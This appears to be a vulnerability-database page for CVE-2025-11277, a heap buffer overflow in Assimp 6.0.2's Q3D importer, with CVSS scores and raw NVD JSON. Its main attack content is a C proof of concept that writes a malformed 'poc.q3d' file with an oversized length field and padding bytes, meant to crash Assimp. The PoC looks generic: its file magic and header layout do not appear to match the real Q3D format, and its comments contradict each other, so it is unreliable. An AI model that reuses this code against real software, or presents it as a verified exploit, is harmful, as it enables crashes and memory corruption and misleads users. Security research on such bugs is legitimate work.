Security Vulnerability Report
CVE-2025-11277 CVSS 5.3 MEDIUM

CVE-2025-11277

Published: 2025-10-05 02:15:37
Last Modified: 2026-04-29 01:00:02

Description

A weakness has been identified in Open Asset Import Library Assimp 6.0.2. This affects the function Q3DImporter::InternReadFile of the file assimp/code/AssetLib/Q3D/Q3DLoader.cpp. Executing a manipulation can lead to heap-based buffer overflow. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:assimp:assimp:6.0.2:*:*:*:*:*:*:* - VULNERABLE
Open Asset Import Library (Assimp) 6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-11277 - Assimp Q3DLoader Heap-based Buffer Overflow PoC
// This PoC demonstrates the vulnerability in Q3DImporter::InternReadFile
// The malicious Q3D file is crafted to trigger heap buffer overflow
// during parsing of Q3D format data.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// Q3D file format header structure
typedef struct {
    char magic[4];        // File magic bytes "q3D\0"
    uint32_t version;     // Format version
    uint32_t num_meshes;  // Number of meshes
    uint32_t data_size;   // Size of mesh data (overly large value triggers overflow)
} Q3DHeader;

// Function to generate malicious Q3D file
int generate_poc(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to create PoC file");
        return -1;
    }

    // Write Q3D header with normal magic and version
    Q3DHeader header;
    memcpy(header.magic, "q3D\0", 4);
    header.version = 1;
    header.num_meshes = 1;

    // Set data_size to an abnormally large value to trigger heap buffer overflow
    // The parser allocates a buffer based on this size but the actual data
    // written exceeds the allocated heap memory region
    header.data_size = 0xFFFFFF;
    fwrite(&header, sizeof(Q3DHeader), 1, fp);

    // Write malicious payload data that exceeds expected buffer size
    // This data will overflow the heap buffer allocated by InternReadFile
    uint8_t payload[4096];
    memset(payload, 'A', sizeof(payload));

    // Write multiple chunks of overflow data
    for (int i = 0; i < 256; i++) {
        fwrite(payload, 1, sizeof(payload), fp);
    }

    fclose(fp);
    printf("[+] Malicious Q3D file generated: %s\n", filename);
    printf("[+] Use Assimp to open this file to trigger CVE-2025-11277\n");
    return 0;
}

int main(int argc, char* argv[]) {
    const char* output_file = (argc > 1) ? argv[1] : "poc.q3d";
    return generate_poc(output_file);
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11277", "sourceIdentifier": "[email protected]", "published": "2025-10-05T02:15:37.470", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Open Asset Import Library Assimp 6.0.2. This affects the function Q3DImporter::InternReadFile of the file assimp/code/AssetLib/Q3D/Q3DLoader.cpp. Executing a manipulation can lead to heap-based buffer overflow. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:assimp:assimp:6.0.2:*:*:*:*:*:*:*", 
"matchCriteriaId": "B5BC643B-B249-45CC-A377-45E37EB62AEA"}]}]}], "references": [{"url": "https://github.com/assimp/assimp/issues/6358", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/user-attachments/files/22422643/poc.zip", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.327011", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327011", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.658912", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}